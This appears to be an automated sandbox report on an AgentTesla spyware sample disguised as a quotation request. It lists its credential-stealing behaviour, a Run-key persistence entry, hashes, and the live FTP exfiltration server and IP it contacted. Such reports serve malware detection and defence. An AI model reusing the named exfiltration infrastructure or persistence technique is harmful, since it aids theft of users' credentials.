sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->36 38 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 22->38 40 Tries to steal Mail credentials (via file / registry access) 22->40 42 Tries to harvest and steal ftp login credentials 22->42 44 Tries to harvest and steal browser information (history, passwords, etc) 22->44 signatures10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Request for Quotation-537262227-04.exe18%ReversingLabsWin32.Trojan.Generic
                    Request for Quotation-537262227-04.exe14%VirustotalBrowse
                    Request for Quotation-537262227-04.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\Oltpxw.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\Oltpxw.exe18%ReversingLabsWin32.Trojan.Generic
                    C:\Users\user\AppData\Roaming\Oltpxw.exe14%VirustotalBrowse

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    ftp.alternatifplastik.com3%VirustotalBrowse
                    rubberpartsmanufacturers.com0%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                    https://account.dyn.com/0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://rubberpartsmanufacturers.com/ikeawc/Arnke.pdf0%VirustotalBrowse
                    https://github.com/mgravell/protobuf-net0%VirustotalBrowse
                    https://github.com/mgravell/protobuf-neti0%VirustotalBrowse
                    https://github.com/mgravell/protobuf-netJ0%VirustotalBrowse
                    https://rubberpartsmanufacturers.com0%VirustotalBrowse
                    https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                    https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
                    http://ftp.alternatifplastik.com3%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ftp.alternatifplastik.com
                    		5.2.84.236
                    		truetrueunknown
                    rubberpartsmanufacturers.com
                    		103.191.208.122
                    		truefalseunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://rubberpartsmanufacturers.com/ikeawc/Arnke.pdffalseunknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://github.com/mgravell/protobuf-netRequest for Quotation-537262227-04.exe, 00000000.00000002.2169044040.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2176585974.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.0000000003A76000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://github.com/mgravell/protobuf-netiRequest for Quotation-537262227-04.exe, 00000000.00000002.2169044040.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2176585974.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.0000000003A76000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://stackoverflow.com/q/14436606/23354Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2176585974.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2156575448.000000000280A000.00000004.00000800.00020000.00000000.sdmp, Oltpxw.exe, 00000004.00000002.2322212414.0000000002A8A000.00000004.00000800.00020000.00000000.sdmp, Oltpxw.exe, 00000006.00000002.2426055475.0000000002E30000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://account.dyn.com/Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2156575448.0000000002A3F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2317429838.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Oltpxw.exe, 00000004.00000002.2344463133.0000000003B97000.00000004.00000800.00020000.00000000.sdmp, Oltpxw.exe, 00000004.00000002.2322212414.0000000002CBC000.00000004.00000800.00020000.00000000.sdmp, Oltpxw.exe, 00000004.00000002.2344463133.0000000003C33000.00000004.00000800.00020000.00000000.sdmp, Oltpxw.exe, 00000006.00000002.2426055475.0000000002F8F000.00000004.00000800.00020000.00000000.sdmp, Oltpxw.exe, 00000006.00000002.2450097423.0000000003F72000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://github.com/mgravell/protobuf-netJRequest for Quotation-537262227-04.exe, 00000000.00000002.2169044040.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2176585974.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, Oltpxw.exe, 00000004.00000002.2344463133.0000000003E2E000.00000004.00000800.00020000.00000000.sdmp, Oltpxw.exe, 00000006.00000002.2450097423.000000000416E000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRequest for Quotation-537262227-04.exe, 00000000.00000002.2156575448.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2323828873.000000000295E000.00000004.00000800.00020000.00000000.sdmp, Oltpxw.exe, 00000004.00000002.2322212414.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2422576609.0000000002AEE000.00000004.00000800.00020000.00000000.sdmp, Oltpxw.exe, 00000006.00000002.2426055475.0000000002D8C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3367618614.000000000265E000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://rubberpartsmanufacturers.comRequest for Quotation-537262227-04.exe, 00000000.00000002.2156575448.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, Oltpxw.exe, 00000004.00000002.2322212414.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, Oltpxw.exe, 00000006.00000002.2426055475.0000000002D8C000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://stackoverflow.com/q/11564914/23354;Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2176585974.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.0000000003A76000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://stackoverflow.com/q/2152978/23354Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2176585974.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.0000000003A76000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://ftp.alternatifplastik.comInstallUtil.exe, 00000002.00000002.2323828873.000000000295E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2323828873.000000000296C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2422576609.0000000002AEE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2422576609.0000000002AFC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3367618614.000000000266C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3367618614.000000000265E000.00000004.00000800.00020000.00000000.sdmpfalseunknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    5.2.84.236
                    		ftp.alternatifplastik.comTurkey
                    		3188ALASTYRTRtrue
                    103.191.208.122
                    		rubberpartsmanufacturers.comunknown
                    		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1530631
                    Start date and time:2024-10-10 09:58:55 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 42s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:10
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:Request for Quotation-537262227-04.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@9/2@2/2
                    EGA Information:
                    • Successful, ratio: 83.3%
                    HCA Information:
                    • Successful, ratio: 97%
                    • Number of executed functions: 514
                    • Number of non-executed functions: 37
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): dl.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target InstallUtil.exe, PID 2172 because it is empty
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    10:00:02AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Oltpxw C:\Users\user\AppData\Roaming\Oltpxw.exe
                    10:00:10AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Oltpxw C:\Users\user\AppData\Roaming\Oltpxw.exe

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    5.2.84.236AYV0eq1Gyc.exeGet hashmaliciousAgentTeslaBrowse
                      GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                        GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                          Kuwait Offer48783929281-BZ2.exeGet hashmaliciousAgentTeslaBrowse
                            PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                              PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exeGet hashmaliciousAgentTeslaBrowse
                                  PO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                                    Richardson Electronics, LTD. PRD10221301UUE.exeGet hashmaliciousAgentTeslaBrowse
                                      PURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                        103.191.208.122AYV0eq1Gyc.exeGet hashmaliciousAgentTeslaBrowse
                                          GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                                            GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              ftp.alternatifplastik.comAYV0eq1Gyc.exeGet hashmaliciousAgentTeslaBrowse
                                              • 5.2.84.236
                                              GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                                              • 5.2.84.236
                                              GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                                              • 5.2.84.236
                                              Kuwait Offer48783929281-BZ2.exeGet hashmaliciousAgentTeslaBrowse
                                              • 5.2.84.236
                                              PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                              • 5.2.84.236
                                              PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                              • 5.2.84.236
                                              inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exeGet hashmaliciousAgentTeslaBrowse
                                              • 5.2.84.236
                                              PO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                                              • 5.2.84.236
                                              Richardson Electronics, LTD. PRD10221301UUE.exeGet hashmaliciousAgentTeslaBrowse
                                              • 5.2.84.236
                                              PURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                              • 5.2.84.236
                                              rubberpartsmanufacturers.comAYV0eq1Gyc.exeGet hashmaliciousAgentTeslaBrowse
                                              • 103.191.208.122
                                              GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                                              • 103.191.208.122
                                              GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                                              • 103.191.208.122

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              ALASTYRTRAYV0eq1Gyc.exeGet hashmaliciousAgentTeslaBrowse
                                              • 5.2.84.236
                                              GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                                              • 5.2.84.236
                                              GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                                              • 5.2.84.236
                                              Kuwait Offer48783929281-BZ2.exeGet hashmaliciousAgentTeslaBrowse
                                              • 5.2.84.236
                                              PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                              • 5.2.84.236
                                              PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                              • 5.2.84.236
                                              inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exeGet hashmaliciousAgentTeslaBrowse
                                              • 5.2.84.236
                                              PO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                                              • 5.2.84.236
                                              Richardson Electronics, LTD. PRD10221301UUE.exeGet hashmaliciousAgentTeslaBrowse
                                              • 5.2.84.236
                                              PURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                              • 5.2.84.236
                                              AARNET-AS-APAustralianAcademicandResearchNetworkAARNena.elfGet hashmaliciousUnknownBrowse
                                              • 103.168.228.170
                                              https://event.stibee.com/v2/click/NDA4MDIvMjQzOTA2MS80OTAyMzcv/aHR0cHM6Ly9uLm5ld3MubmF2ZXIuY29tL21uZXdzL2FydGljbGUvMDI1LzAwMDMzOTE2NDc_c2lkPTEwMQGet hashmaliciousUnknownBrowse
                                              • 103.67.200.72
                                              RFQ-NO-N#U00famero de pedido 106673.exeGet hashmaliciousXWormBrowse
                                              • 103.161.133.94
                                              25XrVZw56S.exeGet hashmaliciousUnknownBrowse
                                              • 103.169.142.0
                                              oUc5lyEzJy.exeGet hashmaliciousUnknownBrowse
                                              • 103.169.142.0
                                              JUHGSyleu7.exeGet hashmaliciousUnknownBrowse
                                              • 103.169.142.0
                                              oUc5lyEzJy.exeGet hashmaliciousUnknownBrowse
                                              • 103.169.142.0
                                              JUHGSyleu7.exeGet hashmaliciousUnknownBrowse
                                              • 103.169.142.0
                                              AYV0eq1Gyc.exeGet hashmaliciousAgentTeslaBrowse
                                              • 103.191.208.122
                                              GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                                              • 103.191.208.122

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              3b5074b1b5d032e5620f69f9f700ff0e#U8a62#U50f9 (RFQ) -RFQ20241010.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 103.191.208.122
                                              Logistics1.vbsGet hashmaliciousFormBookBrowse
                                              • 103.191.208.122
                                              5y3FUtMSB5.exeGet hashmaliciousQuasarBrowse
                                              • 103.191.208.122
                                              Rechnung0192839182.pdfGet hashmaliciousUnknownBrowse
                                              • 103.191.208.122
                                              https://subsale24h.com/Get hashmaliciousUnknownBrowse
                                              • 103.191.208.122
                                              https://unscsupply.goshopgaming.com/?bypass-cdn=1Get hashmaliciousUnknownBrowse
                                              • 103.191.208.122
                                              https://krebsonsecurity.com/2024/10/patch-tuesday-october-2024-editionGet hashmaliciousUnknownBrowse
                                              • 103.191.208.122
                                              p61Wb0tocl.exeGet hashmaliciousXWormBrowse
                                              • 103.191.208.122
                                              432mtXKD3l.exeGet hashmaliciousXWormBrowse
                                              • 103.191.208.122
                                              sUdsWh0FL4.exeGet hashmaliciousXWormBrowse
                                              • 103.191.208.122

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Roaming\Oltpxw.exe

                                              Download File
                                              Process:C:\Users\user\Desktop\Request for Quotation-537262227-04.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):88064
                                              Entropy (8bit):5.689582777423677
                                              Encrypted:false
                                              SSDEEP:1536:k/Wt1GDs0ST9Ehra5T+IKf6wSBzWIZ96maQnltNoKnre6tgwWn:lG5aoI1wSBX96mactWKnMn
                                              MD5:914F3A5BDB348B468C12C2EB6233CEBF
                                              SHA1:F8EE41C3C699C5B80B3614E92FF4F86904B58D84
                                              SHA-256:3D3BB35B07C7936E701822FDB9E243D70CC00B46762583B865A4A137FFA5F49E
                                              SHA-512:867A80169475FEBA03B93F64D580572D3EB9DF5B240B950423828933E879D4859630B0893FD8A1BCA53685E832AA6EABC4CEE810285E8FA258A119356D534412
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 18%
                                              • Antivirus: Virustotal, Detection: 14%, Browse
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$T.g.................N...........m... ........@.. ....................................`.................................Dm..W.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............V..............@..B.................m......H..........|...........|...L............................................s....&*B(....(.........*n(1...~....u....o2.........*....&&*...]&*.*.(....rc..poG...r...p .......oH...&*".(K...&*..{....oM...r...p.{....oM...oN....X._...(O...oP...&*Fr#..pr#..p(J...&*..(Q...*.~....:....rc..p.....(R...oS...sT........~....*.~....*.......*V( ...r...p~....oU...*V( ...r...p~....oU...*V( ...r...p~....oU...*V( ...r...p~....oU...*&...([...*2...([......*&...(n...*&...(o...*&...(q...*&...(r...*&...

                                              C:\Users\user\AppData\Roaming\Oltpxw.exe:Zone.Identifier

                                              Download File
                                              Process:C:\Users\user\Desktop\Request for Quotation-537262227-04.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:modified
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Reputation:high, very likely benign file
                                              Preview:[ZoneTransfer]....ZoneId=0

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):5.689582777423677
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
                                              File name:Request for Quotation-537262227-04.exe
                                              File size:88'064 bytes
                                              MD5:914f3a5bdb348b468c12c2eb6233cebf
                                              SHA1:f8ee41c3c699c5b80b3614e92ff4f86904b58d84
                                              SHA256:3d3bb35b07c7936e701822fdb9e243d70cc00b46762583b865a4a137ffa5f49e
                                              SHA512:867a80169475feba03b93f64d580572d3eb9df5b240b950423828933e879d4859630b0893fd8a1bca53685e832aa6eabc4cee810285e8fa258a119356d534412
                                              SSDEEP:1536:k/Wt1GDs0ST9Ehra5T+IKf6wSBzWIZ96maQnltNoKnre6tgwWn:lG5aoI1wSBX96mactWKnMn
                                              TLSH:28830AA863BC8A27D7FE7B71E0F561100B30FA5BA472EB5D498850FC2453B851A117BB
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$T.g.................N...........m... ........@.. ....................................`................................

                                              File Icon

                                              Icon Hash:00928e8e8686b000

                                              Static PE Info

                                              General

                                              Entrypoint:0x416d9e
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x67075424 [Thu Oct 10 04:12:20 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x16d440x57.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x180000x5a6.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1a0000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000x14da40x14e00700b6a92ef637f58cde7b45b50b65e40False0.4310090755988024data5.7407585193052935IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0x180000x5a60x600d02430dfdc129f680c553a7cb4d59c85False0.4173177083333333data4.08802227744327IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x1a0000xc0x200b361fd14ca7fadcc552740a24fbd116aFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_VERSION0x180a00x31cdata0.43090452261306533
                                              RT_MANIFEST0x183bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-10-10T10:00:05.772082+02002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.5497055.2.84.23621TCP
                                              2024-10-10T10:00:06.388590+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.5497065.2.84.23650955TCP
                                              2024-10-10T10:00:06.394184+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.5497065.2.84.23650955TCP
                                              2024-10-10T10:00:19.864118+02002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.5497645.2.84.23621TCP
                                              2024-10-10T10:00:20.477636+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.5497795.2.84.23664433TCP
                                              2024-10-10T10:00:20.483793+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.5497795.2.84.23664433TCP
                                              2024-10-10T10:00:30.081107+02002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.5498125.2.84.23621TCP
                                              2024-10-10T10:00:30.699366+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.5498265.2.84.23664850TCP
                                              2024-10-10T10:00:30.704521+02002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.5498265.2.84.23664850TCP

                                              Network Port Distribution

                                              TCP Packets

